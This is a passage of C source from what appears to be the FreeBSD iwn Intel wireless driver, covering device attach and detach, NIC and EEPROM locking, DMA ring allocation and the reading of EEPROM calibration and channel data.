IEEE80211_ADDR_COPY(ivp->macaddr, mac1); vap->iv_bmissthreshold = 10; /* override default */ /* Override with driver methods. 
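 * net80211's newstate handler is saved in the vap private data so that
 * iwn_newstate() can chain back to it after the driver-specific work
 * for the state change is done.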
*/ ivp->iv_newstate = vap->iv_newstate; vap->iv_newstate = iwn_newstate; sc->ivap[IWN_RXON_BSS_CTX] = vap; ieee80211_ratectl_init(vap); /* Complete setup. */ ieee80211_vap_attach(vap, iwn_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return vap; } static void iwn_vap_delete(struct ieee80211vap *vap) { struct iwn_vap *ivp = IWN_VAP(vap); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(ivp, M_80211_VAP); } static int iwn_detach(device_t dev) { struct iwn_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic; int qid; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); if (ifp != NULL) { ic = ifp->if_l2com; ieee80211_draintask(ic, &sc->sc_reinit_task); ieee80211_draintask(ic, &sc->sc_radioon_task); ieee80211_draintask(ic, &sc->sc_radiooff_task); iwn_stop(sc); callout_drain(&sc->watchdog_to); callout_drain(&sc->calib_to); ieee80211_ifdetach(ic); } /* Uninstall interrupt handler. */ if (sc->irq != NULL) { bus_teardown_intr(dev, sc->irq, sc->sc_ih); bus_release_resource(dev, SYS_RES_IRQ, rman_get_rid(sc->irq), sc->irq); pci_release_msi(dev); } /* Free DMA resources. */ iwn_free_rx_ring(sc, &sc->rxq); for (qid = 0; qid < sc->ntxqs; qid++) iwn_free_tx_ring(sc, &sc->txq[qid]); iwn_free_sched(sc); iwn_free_kw(sc); if (sc->ict != NULL) iwn_free_ict(sc); iwn_free_fwmem(sc); if (sc->mem != NULL) bus_release_resource(dev, SYS_RES_MEMORY, rman_get_rid(sc->mem), sc->mem); if (ifp != NULL) if_free(ifp); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n", __func__); IWN_LOCK_DESTROY(sc); return 0; } static int iwn_shutdown(device_t dev) { struct iwn_softc *sc = device_get_softc(dev); iwn_stop(sc); return 0; } static int iwn_suspend(device_t dev) { struct iwn_softc *sc = device_get_softc(dev); struct ieee80211com *ic = sc->sc_ifp->if_l2com; ieee80211_suspend_all(ic); return 0; } static int iwn_resume(device_t dev) { struct iwn_softc *sc = device_get_softc(dev); struct ieee80211com *ic = sc->sc_ifp->if_l2com; /* Clear device-specific "PCI retry timeout" register (41h). */ pci_write_config(dev, 0x41, 0, 1); ieee80211_resume_all(ic); return 0; } static int iwn_nic_lock(struct iwn_softc *sc) { int ntries; /* Request exclusive access to NIC. */ IWN_SETBITS(sc, IWN_GP_CNTRL, IWN_GP_CNTRL_MAC_ACCESS_REQ); /* Spin until we actually get the lock. 
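 * Access is granted once MAC_ACCESS_ENA is set and the sleep bit is
 * clear; poll up to 1000 times with a 10us delay before giving up with
 * ETIMEDOUT.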
*/ for (ntries = 0; ntries < 1000; ntries++) { if ((IWN_READ(sc, IWN_GP_CNTRL) & (IWN_GP_CNTRL_MAC_ACCESS_ENA | IWN_GP_CNTRL_SLEEP)) == IWN_GP_CNTRL_MAC_ACCESS_ENA) return 0; DELAY(10); } return ETIMEDOUT; } static __inline void iwn_nic_unlock(struct iwn_softc *sc) { IWN_CLRBITS(sc, IWN_GP_CNTRL, IWN_GP_CNTRL_MAC_ACCESS_REQ); } static __inline uint32_t iwn_prph_read(struct iwn_softc *sc, uint32_t addr) { IWN_WRITE(sc, IWN_PRPH_RADDR, IWN_PRPH_DWORD | addr); IWN_BARRIER_READ_WRITE(sc); return IWN_READ(sc, IWN_PRPH_RDATA); } static __inline void iwn_prph_write(struct iwn_softc *sc, uint32_t addr, uint32_t data) { IWN_WRITE(sc, IWN_PRPH_WADDR, IWN_PRPH_DWORD | addr); IWN_BARRIER_WRITE(sc); IWN_WRITE(sc, IWN_PRPH_WDATA, data); } static __inline void iwn_prph_setbits(struct iwn_softc *sc, uint32_t addr, uint32_t mask) { iwn_prph_write(sc, addr, iwn_prph_read(sc, addr) | mask); } static __inline void iwn_prph_clrbits(struct iwn_softc *sc, uint32_t addr, uint32_t mask) { iwn_prph_write(sc, addr, iwn_prph_read(sc, addr) & ~mask); } static __inline void iwn_prph_write_region_4(struct iwn_softc *sc, uint32_t addr, const uint32_t *data, int count) { for (; count > 0; count--, data++, addr += 4) iwn_prph_write(sc, addr, *data); } static __inline uint32_t iwn_mem_read(struct iwn_softc *sc, uint32_t addr) { IWN_WRITE(sc, IWN_MEM_RADDR, addr); IWN_BARRIER_READ_WRITE(sc); return IWN_READ(sc, IWN_MEM_RDATA); } static __inline void iwn_mem_write(struct iwn_softc *sc, uint32_t addr, uint32_t data) { IWN_WRITE(sc, IWN_MEM_WADDR, addr); IWN_BARRIER_WRITE(sc); IWN_WRITE(sc, IWN_MEM_WDATA, data); } static __inline void iwn_mem_write_2(struct iwn_softc *sc, uint32_t addr, uint16_t data) { uint32_t tmp; tmp = iwn_mem_read(sc, addr & ~3); if (addr & 3) tmp = (tmp & 0x0000ffff) | data << 16; else tmp = (tmp & 0xffff0000) | data; iwn_mem_write(sc, addr & ~3, tmp); } static __inline void iwn_mem_read_region_4(struct iwn_softc *sc, uint32_t addr, uint32_t *data, int count) { for (; count > 0; count--, addr += 4) *data++ = iwn_mem_read(sc, addr); } static __inline void iwn_mem_set_region_4(struct iwn_softc *sc, uint32_t addr, uint32_t val, int count) { for (; count > 0; count--, addr += 4) iwn_mem_write(sc, addr, val); } static int iwn_eeprom_lock(struct iwn_softc *sc) { int i, ntries; for (i = 0; i < 100; i++) { /* Request exclusive access to EEPROM. */ IWN_SETBITS(sc, IWN_HW_IF_CONFIG, IWN_HW_IF_CONFIG_EEPROM_LOCKED); /* Spin until we actually get the lock. */ for (ntries = 0; ntries < 100; ntries++) { if (IWN_READ(sc, IWN_HW_IF_CONFIG) & IWN_HW_IF_CONFIG_EEPROM_LOCKED) return 0; DELAY(10); } } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end timeout\n", __func__); return ETIMEDOUT; } static __inline void iwn_eeprom_unlock(struct iwn_softc *sc) { IWN_CLRBITS(sc, IWN_HW_IF_CONFIG, IWN_HW_IF_CONFIG_EEPROM_LOCKED); } /* * Initialize access by host to One Time Programmable ROM. * NB: This kind of ROM can be found on 1000 or 6000 Series only. */ static int iwn_init_otprom(struct iwn_softc *sc) { uint16_t prev, base, next; int count, error; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Wait for clock stabilization before accessing prph. */ if ((error = iwn_clock_wait(sc)) != 0) return error; if ((error = iwn_nic_lock(sc)) != 0) return error; iwn_prph_setbits(sc, IWN_APMG_PS, IWN_APMG_PS_RESET_REQ); DELAY(5); iwn_prph_clrbits(sc, IWN_APMG_PS, IWN_APMG_PS_RESET_REQ); iwn_nic_unlock(sc); /* Set auto clock gate disable bit for HW with OTP shadow RAM. 
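 * Adapters without shadow RAM instead walk the OTP linked list further
 * below to locate the block that holds the EEPROM image.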
*/ if (sc->base_params->shadow_ram_support) { IWN_SETBITS(sc, IWN_DBG_LINK_PWR_MGMT, IWN_RESET_LINK_PWR_MGMT_DIS); } IWN_CLRBITS(sc, IWN_EEPROM_GP, IWN_EEPROM_GP_IF_OWNER); /* Clear ECC status. */ IWN_SETBITS(sc, IWN_OTP_GP, IWN_OTP_GP_ECC_CORR_STTS | IWN_OTP_GP_ECC_UNCORR_STTS); /* * Find the block before last block (contains the EEPROM image) * for HW without OTP shadow RAM. */ if (! sc->base_params->shadow_ram_support) { /* Switch to absolute addressing mode. */ IWN_CLRBITS(sc, IWN_OTP_GP, IWN_OTP_GP_RELATIVE_ACCESS); base = prev = 0; for (count = 0; count < sc->base_params->max_ll_items; count++) { error = iwn_read_prom_data(sc, base, &next, 2); if (error != 0) return error; if (next == 0) /* End of linked-list. */ break; prev = base; base = le16toh(next); } if (count == 0 || count == sc->base_params->max_ll_items) return EIO; /* Skip "next" word. */ sc->prom_base = prev + 1; } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); return 0; } static int iwn_read_prom_data(struct iwn_softc *sc, uint32_t addr, void *data, int count) { uint8_t *out = data; uint32_t val, tmp; int ntries; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); addr += sc->prom_base; for (; count > 0; count -= 2, addr++) { IWN_WRITE(sc, IWN_EEPROM, addr << 2); for (ntries = 0; ntries < 10; ntries++) { val = IWN_READ(sc, IWN_EEPROM); if (val & IWN_EEPROM_READ_VALID) break; DELAY(5); } if (ntries == 10) { device_printf(sc->sc_dev, "timeout reading ROM at 0x%x\n", addr); return ETIMEDOUT; } if (sc->sc_flags & IWN_FLAG_HAS_OTPROM) { /* OTPROM, check for ECC errors. */ tmp = IWN_READ(sc, IWN_OTP_GP); if (tmp & IWN_OTP_GP_ECC_UNCORR_STTS) { device_printf(sc->sc_dev, "OTPROM ECC error at 0x%x\n", addr); return EIO; } if (tmp & IWN_OTP_GP_ECC_CORR_STTS) { /* Correctable ECC error, clear bit. 
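 * The data read is still valid, so just acknowledge the status bit and
 * keep the word.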
*/ IWN_SETBITS(sc, IWN_OTP_GP, IWN_OTP_GP_ECC_CORR_STTS); } } *out++ = val >> 16; if (count > 1) *out++ = val >> 24; } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); return 0; } static void iwn_dma_map_addr(void *arg, bus_dma_segment_t *segs, int nsegs, int error) { if (error != 0) return; KASSERT(nsegs == 1, ("too many DMA segments, %d should be 1", nsegs)); *(bus_addr_t *)arg = segs[0].ds_addr; } static int iwn_dma_contig_alloc(struct iwn_softc *sc, struct iwn_dma_info *dma, void **kvap, bus_size_t size, bus_size_t alignment) { int error; dma->tag = NULL; dma->size = size; error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), alignment, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, size, 1, size, BUS_DMA_NOWAIT, NULL, NULL, &dma->tag); if (error != 0) goto fail; error = bus_dmamem_alloc(dma->tag, (void **)&dma->vaddr, BUS_DMA_NOWAIT | BUS_DMA_ZERO | BUS_DMA_COHERENT, &dma->map); if (error != 0) goto fail; error = bus_dmamap_load(dma->tag, dma->map, dma->vaddr, size, iwn_dma_map_addr, &dma->paddr, BUS_DMA_NOWAIT); if (error != 0) goto fail; bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_PREWRITE); if (kvap != NULL) *kvap = dma->vaddr; return 0; fail: iwn_dma_contig_free(dma); return error; } static void iwn_dma_contig_free(struct iwn_dma_info *dma) { if (dma->map != NULL) { if (dma->vaddr != NULL) { bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_POSTREAD | BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(dma->tag, dma->map); bus_dmamem_free(dma->tag, dma->vaddr, dma->map); dma->vaddr = NULL; } bus_dmamap_destroy(dma->tag, dma->map); dma->map = NULL; } if (dma->tag != NULL) { bus_dma_tag_destroy(dma->tag); dma->tag = NULL; } } static int iwn_alloc_sched(struct iwn_softc *sc) { /* TX scheduler rings must be aligned on a 1KB boundary. */ return iwn_dma_contig_alloc(sc, &sc->sched_dma, (void **)&sc->sched, sc->schedsz, 1024); } static void iwn_free_sched(struct iwn_softc *sc) { iwn_dma_contig_free(&sc->sched_dma); } static int iwn_alloc_kw(struct iwn_softc *sc) { /* "Keep Warm" page must be aligned on a 4KB boundary. */ return iwn_dma_contig_alloc(sc, &sc->kw_dma, NULL, 4096, 4096); } static void iwn_free_kw(struct iwn_softc *sc) { iwn_dma_contig_free(&sc->kw_dma); } static int iwn_alloc_ict(struct iwn_softc *sc) { /* ICT table must be aligned on a 4KB boundary. */ return iwn_dma_contig_alloc(sc, &sc->ict_dma, (void **)&sc->ict, IWN_ICT_SIZE, 4096); } static void iwn_free_ict(struct iwn_softc *sc) { iwn_dma_contig_free(&sc->ict_dma); } static int iwn_alloc_fwmem(struct iwn_softc *sc) { /* Must be aligned on a 16-byte boundary. */ return iwn_dma_contig_alloc(sc, &sc->fw_dma, NULL, sc->fwsz, 16); } static void iwn_free_fwmem(struct iwn_softc *sc) { iwn_dma_contig_free(&sc->fw_dma); } static int iwn_alloc_rx_ring(struct iwn_softc *sc, struct iwn_rx_ring *ring) { bus_size_t size; int i, error; ring->cur = 0; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Allocate RX descriptors (256-byte aligned). */ size = IWN_RX_RING_COUNT * sizeof (uint32_t); error = iwn_dma_contig_alloc(sc, &ring->desc_dma, (void **)&ring->desc, size, 256); if (error != 0) { device_printf(sc->sc_dev, "%s: could not allocate RX ring DMA memory, error %d\n", __func__, error); goto fail; } /* Allocate RX status area (16-byte aligned). 
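 * The status area is a small structure the firmware updates with the
 * index of the most recently closed RX descriptor.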
*/ error = iwn_dma_contig_alloc(sc, &ring->stat_dma, (void **)&ring->stat, sizeof (struct iwn_rx_status), 16); if (error != 0) { device_printf(sc->sc_dev, "%s: could not allocate RX status DMA memory, error %d\n", __func__, error); goto fail; } /* Create RX buffer DMA tag. */ error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, IWN_RBUF_SIZE, 1, IWN_RBUF_SIZE, BUS_DMA_NOWAIT, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "%s: could not create RX buf DMA tag, error %d\n", __func__, error); goto fail; } /* * Allocate and map RX buffers. */ for (i = 0; i < IWN_RX_RING_COUNT; i++) { struct iwn_rx_data *data = &ring->data[i]; bus_addr_t paddr; error = bus_dmamap_create(ring->data_dmat, 0, &data->map); if (error != 0) { device_printf(sc->sc_dev, "%s: could not create RX buf DMA map, error %d\n", __func__, error); goto fail; } data->m = m_getjcl(M_NOWAIT, MT_DATA, M_PKTHDR, IWN_RBUF_SIZE); if (data->m == NULL) { device_printf(sc->sc_dev, "%s: could not allocate RX mbuf\n", __func__); error = ENOBUFS; goto fail; } error = bus_dmamap_load(ring->data_dmat, data->map, mtod(data->m, void *), IWN_RBUF_SIZE, iwn_dma_map_addr, &paddr, BUS_DMA_NOWAIT); if (error != 0 && error != EFBIG) { device_printf(sc->sc_dev, "%s: can't not map mbuf, error %d\n", __func__, error); goto fail; } /* Set physical address of RX buffer (256-byte aligned). */ ring->desc[i] = htole32(paddr >> 8); } bus_dmamap_sync(ring->desc_dma.tag, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return 0; fail: iwn_free_rx_ring(sc, ring); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end in error\n",__func__); return error; } static void iwn_reset_rx_ring(struct iwn_softc *sc, struct iwn_rx_ring *ring) { int ntries; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); if (iwn_nic_lock(sc) == 0) { IWN_WRITE(sc, IWN_FH_RX_CONFIG, 0); for (ntries = 0; ntries < 1000; ntries++) { if (IWN_READ(sc, IWN_FH_RX_STATUS) & IWN_FH_RX_STATUS_IDLE) break; DELAY(10); } iwn_nic_unlock(sc); } ring->cur = 0; sc->last_rx_valid = 0; } static void iwn_free_rx_ring(struct iwn_softc *sc, struct iwn_rx_ring *ring) { int i; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s \n", __func__); iwn_dma_contig_free(&ring->desc_dma); iwn_dma_contig_free(&ring->stat_dma); for (i = 0; i < IWN_RX_RING_COUNT; i++) { struct iwn_rx_data *data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); data->m = NULL; } if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } if (ring->data_dmat != NULL) { bus_dma_tag_destroy(ring->data_dmat); ring->data_dmat = NULL; } } static int iwn_alloc_tx_ring(struct iwn_softc *sc, struct iwn_tx_ring *ring, int qid) { bus_addr_t paddr; bus_size_t size; int i, error; ring->qid = qid; ring->queued = 0; ring->cur = 0; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Allocate TX descriptors (256-byte aligned). 
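 * A parallel array of command buffers (struct iwn_tx_cmd) is allocated
 * from a single DMA block right after this; each slot's cmd_paddr and
 * scratch_paddr are derived from that block's base address.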
*/ size = IWN_TX_RING_COUNT * sizeof (struct iwn_tx_desc); error = iwn_dma_contig_alloc(sc, &ring->desc_dma, (void **)&ring->desc, size, 256); if (error != 0) { device_printf(sc->sc_dev, "%s: could not allocate TX ring DMA memory, error %d\n", __func__, error); goto fail; } size = IWN_TX_RING_COUNT * sizeof (struct iwn_tx_cmd); error = iwn_dma_contig_alloc(sc, &ring->cmd_dma, (void **)&ring->cmd, size, 4); if (error != 0) { device_printf(sc->sc_dev, "%s: could not allocate TX cmd DMA memory, error %d\n", __func__, error); goto fail; } error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, IWN_MAX_SCATTER - 1, MCLBYTES, BUS_DMA_NOWAIT, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "%s: could not create TX buf DMA tag, error %d\n", __func__, error); goto fail; } paddr = ring->cmd_dma.paddr; for (i = 0; i < IWN_TX_RING_COUNT; i++) { struct iwn_tx_data *data = &ring->data[i]; data->cmd_paddr = paddr; data->scratch_paddr = paddr + 12; paddr += sizeof (struct iwn_tx_cmd); error = bus_dmamap_create(ring->data_dmat, 0, &data->map); if (error != 0) { device_printf(sc->sc_dev, "%s: could not create TX buf DMA map, error %d\n", __func__, error); goto fail; } } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); return 0; fail: iwn_free_tx_ring(sc, ring); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end in error\n", __func__); return error; } static void iwn_reset_tx_ring(struct iwn_softc *sc, struct iwn_tx_ring *ring) { int i; DPRINTF(sc, IWN_DEBUG_TRACE, "->doing %s \n", __func__); for (i = 0; i < IWN_TX_RING_COUNT; i++) { struct iwn_tx_data *data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); data->m = NULL; } } /* Clear TX descriptors. */ memset(ring->desc, 0, ring->desc_dma.size); bus_dmamap_sync(ring->desc_dma.tag, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); sc->qfullmsk &= ~(1 << ring->qid); ring->queued = 0; ring->cur = 0; } static void iwn_free_tx_ring(struct iwn_softc *sc, struct iwn_tx_ring *ring) { int i; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s \n", __func__); iwn_dma_contig_free(&ring->desc_dma); iwn_dma_contig_free(&ring->cmd_dma); for (i = 0; i < IWN_TX_RING_COUNT; i++) { struct iwn_tx_data *data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); } if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } if (ring->data_dmat != NULL) { bus_dma_tag_destroy(ring->data_dmat); ring->data_dmat = NULL; } } static void iwn5000_ict_reset(struct iwn_softc *sc) { /* Disable interrupts. */ IWN_WRITE(sc, IWN_INT_MASK, 0); /* Reset ICT table. */ memset(sc->ict, 0, IWN_ICT_SIZE); sc->ict_cur = 0; /* Set physical address of ICT table (4KB aligned). */ DPRINTF(sc, IWN_DEBUG_RESET, "%s: enabling ICT\n", __func__); IWN_WRITE(sc, IWN_DRAM_INT_TBL, IWN_DRAM_INT_TBL_ENABLE | IWN_DRAM_INT_TBL_WRAP_CHECK | sc->ict_dma.paddr >> 12); /* Enable periodic RX interrupt. */ sc->int_mask |= IWN_INT_RX_PERIODIC; /* Switch to ICT interrupt mode in driver. */ sc->sc_flags |= IWN_FLAG_USE_ICT; /* Re-enable interrupts. 
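 * Acknowledge anything still pending and unmask the interrupts selected
 * in sc->int_mask.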
*/ IWN_WRITE(sc, IWN_INT, 0xffffffff); IWN_WRITE(sc, IWN_INT_MASK, sc->int_mask); } static int iwn_read_eeprom(struct iwn_softc *sc, uint8_t macaddr[IEEE80211_ADDR_LEN]) { struct iwn_ops *ops = &sc->ops; uint16_t val; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Check whether adapter has an EEPROM or an OTPROM. */ if (sc->hw_type >= IWN_HW_REV_TYPE_1000 && (IWN_READ(sc, IWN_OTP_GP) & IWN_OTP_GP_DEV_SEL_OTP)) sc->sc_flags |= IWN_FLAG_HAS_OTPROM; DPRINTF(sc, IWN_DEBUG_RESET, "%s found\n", (sc->sc_flags & IWN_FLAG_HAS_OTPROM) ? "OTPROM" : "EEPROM"); /* Adapter has to be powered on for EEPROM access to work. */ if ((error = iwn_apm_init(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not power ON adapter, error %d\n", __func__, error); return error; } if ((IWN_READ(sc, IWN_EEPROM_GP) & 0x7) == 0) { device_printf(sc->sc_dev, "%s: bad ROM signature\n", __func__); return EIO; } if ((error = iwn_eeprom_lock(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not lock ROM, error %d\n", __func__, error); return error; } if (sc->sc_flags & IWN_FLAG_HAS_OTPROM) { if ((error = iwn_init_otprom(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not initialize OTPROM, error %d\n", __func__, error); return error; } } iwn_read_prom_data(sc, IWN_EEPROM_SKU_CAP, &val, 2); DPRINTF(sc, IWN_DEBUG_RESET, "SKU capabilities=0x%04x\n", le16toh(val)); /* Check if HT support is bonded out. */ if (val & htole16(IWN_EEPROM_SKU_CAP_11N)) sc->sc_flags |= IWN_FLAG_HAS_11N; iwn_read_prom_data(sc, IWN_EEPROM_RFCFG, &val, 2); sc->rfcfg = le16toh(val); DPRINTF(sc, IWN_DEBUG_RESET, "radio config=0x%04x\n", sc->rfcfg); /* Read Tx/Rx chains from ROM unless it's known to be broken. */ if (sc->txchainmask == 0) sc->txchainmask = IWN_RFCFG_TXANTMSK(sc->rfcfg); if (sc->rxchainmask == 0) sc->rxchainmask = IWN_RFCFG_RXANTMSK(sc->rfcfg); /* Read MAC address. */ iwn_read_prom_data(sc, IWN_EEPROM_MAC, macaddr, 6); /* Read adapter-specific information from EEPROM. */ ops->read_eeprom(sc); iwn_apm_stop(sc); /* Power OFF adapter. */ iwn_eeprom_unlock(sc); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); return 0; } static void iwn4965_read_eeprom(struct iwn_softc *sc) { uint32_t addr; uint16_t val; int i; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Read regulatory domain (4 ASCII characters). */ iwn_read_prom_data(sc, IWN4965_EEPROM_DOMAIN, sc->eeprom_domain, 4); /* Read the list of authorized channels (20MHz ones only). */ for (i = 0; i < IWN_NBANDS - 1; i++) { addr = iwn4965_regulatory_bands[i]; iwn_read_eeprom_channels(sc, i, addr); } /* Read maximum allowed TX power for 2GHz and 5GHz bands. */ iwn_read_prom_data(sc, IWN4965_EEPROM_MAXPOW, &val, 2); sc->maxpwr2GHz = val & 0xff; sc->maxpwr5GHz = val >> 8; /* Check that EEPROM values are within valid range. */ if (sc->maxpwr5GHz < 20 || sc->maxpwr5GHz > 50) sc->maxpwr5GHz = 38; if (sc->maxpwr2GHz < 20 || sc->maxpwr2GHz > 50) sc->maxpwr2GHz = 38; DPRINTF(sc, IWN_DEBUG_RESET, "maxpwr 2GHz=%d 5GHz=%d\n", sc->maxpwr2GHz, sc->maxpwr5GHz); /* Read samples for each TX power group. */ iwn_read_prom_data(sc, IWN4965_EEPROM_BANDS, sc->bands, sizeof sc->bands); /* Read voltage at which samples were taken. */ iwn_read_prom_data(sc, IWN4965_EEPROM_VOLTAGE, &val, 2); sc->eeprom_voltage = (int16_t)le16toh(val); DPRINTF(sc, IWN_DEBUG_RESET, "voltage=%d (in 0.3V)\n", sc->eeprom_voltage); #ifdef IWN_DEBUG /* Print samples. 
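 * Dump the per-band TX power samples whenever any debug flag is set.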
*/ if (sc->sc_debug & IWN_DEBUG_ANY) { for (i = 0; i < IWN_NBANDS - 1; i++) iwn4965_print_power_group(sc, i); } #endif DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); } #ifdef IWN_DEBUG static void iwn4965_print_power_group(struct iwn_softc *sc, int i) { struct iwn4965_eeprom_band *band = &sc->bands[i]; struct iwn4965_eeprom_chan_samples *chans = band->chans; int j, c; printf("===band %d===\n", i); printf("chan lo=%d, chan hi=%d\n", band->lo, band->hi); printf("chan1 num=%d\n", chans[0].num); for (c = 0; c < 2; c++) { for (j = 0; j < IWN_NSAMPLES; j++) { printf("chain %d, sample %d: temp=%d gain=%d " "power=%d pa_det=%d\n", c, j, chans[0].samples[c][j].temp, chans[0].samples[c][j].gain, chans[0].samples[c][j].power, chans[0].samples[c][j].pa_det); } } printf("chan2 num=%d\n", chans[1].num); for (c = 0; c < 2; c++) { for (j = 0; j < IWN_NSAMPLES; j++) { printf("chain %d, sample %d: temp=%d gain=%d " "power=%d pa_det=%d\n", c, j, chans[1].samples[c][j].temp, chans[1].samples[c][j].gain, chans[1].samples[c][j].power, chans[1].samples[c][j].pa_det); } } } #endif static void iwn5000_read_eeprom(struct iwn_softc *sc) { struct iwn5000_eeprom_calib_hdr hdr; int32_t volt; uint32_t base, addr; uint16_t val; int i; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Read regulatory domain (4 ASCII characters). */ iwn_read_prom_data(sc, IWN5000_EEPROM_REG, &val, 2); base = le16toh(val); iwn_read_prom_data(sc, base + IWN5000_EEPROM_DOMAIN, sc->eeprom_domain, 4); /* Read the list of authorized channels (20MHz ones only). */ for (i = 0; i < IWN_NBANDS - 1; i++) { addr = base + sc->base_params->regulatory_bands[i]; iwn_read_eeprom_channels(sc, i, addr); } /* Read enhanced TX power information for 6000 Series. */ if (sc->base_params->enhanced_TX_power) iwn_read_eeprom_enhinfo(sc); iwn_read_prom_data(sc, IWN5000_EEPROM_CAL, &val, 2); base = le16toh(val); iwn_read_prom_data(sc, base, &hdr, sizeof hdr); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: calib version=%u pa type=%u voltage=%u\n", __func__, hdr.version, hdr.pa_type, le16toh(hdr.volt)); sc->calib_ver = hdr.version; if (sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_TEMP_OFFSETv2) { sc->eeprom_voltage = le16toh(hdr.volt); iwn_read_prom_data(sc, base + IWN5000_EEPROM_TEMP, &val, 2); sc->eeprom_temp_high=le16toh(val); iwn_read_prom_data(sc, base + IWN5000_EEPROM_VOLT, &val, 2); sc->eeprom_temp = le16toh(val); } if (sc->hw_type == IWN_HW_REV_TYPE_5150) { /* Compute temperature offset. */ iwn_read_prom_data(sc, base + IWN5000_EEPROM_TEMP, &val, 2); sc->eeprom_temp = le16toh(val); iwn_read_prom_data(sc, base + IWN5000_EEPROM_VOLT, &val, 2); volt = le16toh(val); sc->temp_off = sc->eeprom_temp - (volt / -5); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "temp=%d volt=%d offset=%dK\n", sc->eeprom_temp, volt, sc->temp_off); } else { /* Read crystal calibration. */ iwn_read_prom_data(sc, base + IWN5000_EEPROM_CRYSTAL, &sc->eeprom_crystal, sizeof (uint32_t)); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "crystal calibration 0x%08x\n", le32toh(sc->eeprom_crystal)); } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); } /* * Translate EEPROM flags to net80211. 
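 * Channels not marked active become passive-scan only, channels without
 * the IBSS bit reject adhoc, and radar channels are flagged DFS (and,
 * conservatively, no-adhoc as well).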
*/ static uint32_t iwn_eeprom_channel_flags(struct iwn_eeprom_chan *channel) { uint32_t nflags; nflags = 0; if ((channel->flags & IWN_EEPROM_CHAN_ACTIVE) == 0) nflags |= IEEE80211_CHAN_PASSIVE; if ((channel->flags & IWN_EEPROM_CHAN_IBSS) == 0) nflags |= IEEE80211_CHAN_NOADHOC; if (channel->flags & IWN_EEPROM_CHAN_RADAR) { nflags |= IEEE80211_CHAN_DFS; /* XXX apparently IBSS may still be marked */ nflags |= IEEE80211_CHAN_NOADHOC; } return nflags; } static void iwn_read_eeprom_band(struct iwn_softc *sc, int n) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct iwn_eeprom_chan *channels = sc->eeprom_channels[n]; const struct iwn_chan_band *band = &iwn_bands[n]; struct ieee80211_channel *c; uint8_t chan; int i, nflags; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); for (i = 0; i < band->nchan; i++) { if (!(channels[i].flags & IWN_EEPROM_CHAN_VALID)) { DPRINTF(sc, IWN_DEBUG_RESET, "skip chan %d flags 0x%x maxpwr %d\n", band->chan[i], channels[i].flags, channels[i].maxpwr); continue; } chan = band->chan[i]; nflags = iwn_eeprom_channel_flags(&channels[i]); c = &ic->ic_channels[ic->ic_nchans++]; c->ic_ieee = chan; c->ic_maxregpower = channels[i].maxpwr; c->ic_maxpower = 2*c->ic_maxregpower; if (n == 0) { /* 2GHz band */ c->ic_freq = ieee80211_ieee2mhz(chan, IEEE80211_CHAN_G); /* G =>'s B is supported */ 